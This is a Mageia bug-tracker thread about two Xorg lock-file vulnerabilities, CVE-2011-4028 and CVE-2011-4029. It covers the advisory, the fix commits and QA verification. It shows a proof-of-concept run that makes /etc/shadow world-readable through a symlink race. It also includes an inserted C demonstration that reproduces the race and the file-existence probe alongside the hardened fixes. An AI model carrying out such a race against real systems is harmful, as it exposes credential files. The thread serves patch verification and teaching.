From this mail: http://lists.freedesktop.org/archives/xorg-announce/2011-October/001744.html

Two vulnerabilities have been discovered in the code handling the X server lock, which forbids two X servers from serving the same display simultaneously.

o CVE-2011-4028: File disclosure vulnerability: It is possible to deduce whether a file exists or not by exploiting the way that Xorg creates its lock files. This is caused by the fact that the X server behaves differently if the lock file already exists as a symbolic link pointing to an existing or non-existing file.

o CVE-2011-4029: File permission change vulnerability: It is possible for a non-root user to set the permissions for all users on any file or directory to 444, giving unwanted read access or causing denial of service (by removing execute permission). This is caused by a race between creating the lock file and setting its access modes.

Fix
---

Those issues have been fixed by the following two git commits:

CVE-2011-4028: 6ba44b91e37622ef8c146d8f2ac92d708a18ed34
http://cgit.freedesktop.org/xorg/xserver/commit/?id=6ba44b91e37622ef8c146d8f2ac92d708a18ed34

CVE-2011-4029: b67581cf825940fdf52bf2e0af4330e695d724a4
http://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4
Ping?
I've no time for this
Assignee: thierry.vignaud => security
I'll look at this one.
CC: (none) => dmorganec
Pushed to updates_testing, fixing the 2 CVEs.
Assignee: security_officers => qa-bugs
Created attachment 1325
POC for CVE-2011-4029

There are instructions in the file; I have not tried it yet, though.
POC does work as intended and shows we are vulnerable.

Testing x86_64

Before
------

$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow
$ ./xchmod /etc/shadow
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 3877 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 3877 resumed (SIGCONT sent)
[+] Attack succeeded, ls -l /etc/shadow:
-r--r--r-- 1 root shadow 1174 Jan  3 11:14 /etc/shadow
$ ll /etc/shadow
-r--r--r-- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

Undoing it..

$ su -c "chmod 440 /etc/shadow" -
Password:
$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

After
-----

The following 3 packages are going to be installed:
- x11-server-common-1.10.1-1.1.mga1.x86_64
- x11-server-devel-1.10.1-1.1.mga1.x86_64
- x11-server-xorg-1.10.1-1.1.mga1.x86_64

$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow
$ ./xchmod /etc/shadow
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 5223 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 5223 resumed (SIGCONT sent)
[-] Attack failed, rights are 100440. Try again!
$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow
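The two lock-file patterns the advisory above describes, and the effect the PoC output shows, as an added example that is not part of this bug report, of the attached xchmod PoC, or of the Xorg source. It takes the same approach as the referenced fix commits (fchmod() on the descriptor the server still holds, O_NOFOLLOW when opening an existing lock) but uses made-up function names and a private temp directory under /tmp in place of /tmp/.tX1-lock and /tmp/.X1-lock. The race window that the PoC opens with SIGSTOP is simulated deterministically by a hook the caller runs between the two steps, so the result is reproducible without a running X server.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Demo-only stand-in for the race window: the PoC gets it with SIGSTOP,
 * here the caller runs it between "create the lock" and "set its mode". */
typedef void (*race_hook_fn)(const char *lock_path, void *ctx);

/* Pre-fix shape: exclusive create, write the pid, then chmod() the NAME.
 * chmod() resolves the name again, so a symlink planted in between is followed. */
int lock_chmod_by_name(const char *lock_path, race_hook_fn hook, void *ctx)
{
    int fd = open(lock_path, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0)
        return -1;
    dprintf(fd, "%10ld\n", (long)getpid());
    close(fd);
    if (hook)
        hook(lock_path, ctx);
    return chmod(lock_path, 0444);
}

/* Fixed shape: same create, but fchmod() the descriptor we still hold, which
 * acts on the inode we created whatever the name points to by now. */
int lock_fchmod_by_fd(const char *lock_path, race_hook_fn hook, void *ctx)
{
    int fd = open(lock_path, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0)
        return -1;
    dprintf(fd, "%10ld\n", (long)getpid());
    if (hook)
        hook(lock_path, ctx);
    int rc = fchmod(fd, 0444);
    close(fd);
    return rc;
}

/* The attacker's move inside the window (the PoC does this with a second
 * Xorg process plus a symlink): drop the lock, point its name at the victim. */
static void plant_symlink(const char *lock_path, void *ctx)
{
    unlink(lock_path);
    (void)symlink((const char *)ctx, lock_path);
}

static int file_mode(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (int)(st.st_mode & 07777) : -1;
}

/* CVE-2011-4029 demo against a private 0600 victim in a fresh temp dir.
 * Returns the victim's mode afterwards: 0444 means the attack landed. */
int demo_chmod_race(int hardened)
{
    char dir[] = "/tmp/xlockdemo.XXXXXX", victim[160], lock[160];
    if (!mkdtemp(dir))
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lock, sizeof lock, "%s/.tX1-lock", dir);
    int vfd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (vfd < 0)
        return -1;
    close(vfd);
    if (hardened)
        lock_fchmod_by_fd(lock, plant_symlink, victim);
    else
        lock_chmod_by_name(lock, plant_symlink, victim);
    int mode = file_mode(victim);
    unlink(lock); unlink(victim); rmdir(dir);
    return mode;
}

/* CVE-2011-4028 demo: the existing lock name is a symlink and the server opens
 * it to read the pid. Returns 0 on success, else errno. Without O_NOFOLLOW the
 * outcome leaks whether the target exists (0 vs ENOENT); with it, ELOOP either way. */
int demo_probe(int nofollow, int target_exists)
{
    char dir[] = "/tmp/xlockdemo.XXXXXX", target[160], lock[160];
    if (!mkdtemp(dir))
        return -1;
    snprintf(target, sizeof target, "%s/secret", dir);
    snprintf(lock, sizeof lock, "%s/.X1-lock", dir);
    if (target_exists) {
        int tfd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
        if (tfd < 0)
            return -1;
        close(tfd);
    }
    (void)symlink(target, lock);
    int fd = open(lock, O_RDONLY | (nofollow ? O_NOFOLLOW : 0));
    int result = fd < 0 ? errno : 0;   /* capture errno before cleanup clobbers it */
    if (fd >= 0)
        close(fd);
    unlink(lock); unlink(target); rmdir(dir);
    return result;
}

int main(void)
{
    printf("chmod by name: victim mode 0%o\n", demo_chmod_race(0));
    printf("fchmod by fd : victim mode 0%o\n", demo_chmod_race(1));
    printf("plain open   : exists=%d missing=%d\n", demo_probe(0, 1), demo_probe(0, 0));
    printf("O_NOFOLLOW   : exists=%d missing=%d\n", demo_probe(1, 1), demo_probe(1, 0));
    return 0;
}
```

The victim file is owned by the user running the demo, so no root is needed to see the mode change; in the real attack the server does the chmod() as root, which is why /etc/shadow is reachable. The symlink lives in a private 0700 directory rather than a sticky world-writable one, so the kernel's protected_symlinks restriction does not interfere with the demonstration.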
Testing complete on i586.

Could someone from the sysadmin team push the srpm x11-server-1.10.1-1.1.mga1.src.rpm from Core Updates Testing to Core Updates.

Advisory:

This security update for x11-server corrects the following two vulnerabilities discovered in the code handling the X server lock, which forbids two X servers from serving the same display simultaneously.

o CVE-2011-4028: File disclosure vulnerability: It is possible to deduce whether a file exists or not by exploiting the way that Xorg creates its lock files. This is caused by the fact that the X server behaves differently if the lock file already exists as a symbolic link pointing to an existing or non-existing file.

o CVE-2011-4029: File permission change vulnerability: It is possible for a non-root user to set the permissions for all users on any file or directory to 444, giving unwanted read access or causing denial of service (by removing execute permission). This is caused by a race between creating the lock file and setting its access modes.

https://bugs.mageia.org/show_bug.cgi?id=3102
Keywords: (none) => validated_update
CC: (none) => davidwhodgins, sysadmin-bugs
Update pushed.
Status: NEW => RESOLVED
CC: (none) => tmb
Resolution: (none) => FIXED